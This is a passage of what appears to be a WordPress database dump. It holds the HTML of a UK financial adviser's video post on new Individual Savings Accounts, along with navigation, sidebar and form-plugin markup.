{\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	Mortgage Strategic Alliance','Reid Scott Ross set up new strategic mortgage alliance with Mortgageforce Scotland to offer a comprehensive whole of market mortgage search and service','publish','closed','closed','','mortgage-strategic-alliance','','','2017-09-21 16:34:35','2017-09-21 16:34:35','',0,'http://www.equalitywalk.org.uk/mortgage-strategic-alliance',0,'page','',0),(83,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<body class=\"single single-post postid-8774 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										The New Individual Savings Accounts — Q&amp;A										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>The New Individual Savings Accounts — Q&amp;A</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8774\" class=\"post-8774 post type-post status-publish format-video hentry category-video-2 post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">The New Individual Savings Accounts — Q&amp;A</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe src=\"http://www.youtube.com/embed/Wga7AsFLzhI?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../new-individual-savings-accounts-qa/\" title=\"Comment on The New Individual Savings Accounts — Q&amp;A\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/&amp;p[title]=The%20New%20Individual%20Savings%20Accounts%20%E2%80%94%20Q&amp;A\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=The+New+Individual+Savings+Accounts+--+Q%26A+%20http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/&amp;title=The%20New%20Individual%20Savings%20Accounts%20%E2%80%94%20Q&amp;A\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/&amp;title=The%20New%20Individual%20Savings%20Accounts%20%E2%80%94%20Q&amp;A\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts-qa%2F&amp;name=The+New+Individual+Savings+Accounts+--+Q%26A+&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts-qa%2F&amp;description=The+New+Individual+Savings+Accounts+--+Q%26A+&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=The New Individual Savings Accounts — Q&amp;A&amp;body=http://www.equalitywalk.org.uk/new-individual-savings-accounts-qa/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../new-individual-savings-accounts-qa/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8774\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"57bd524fb0\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"116\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" 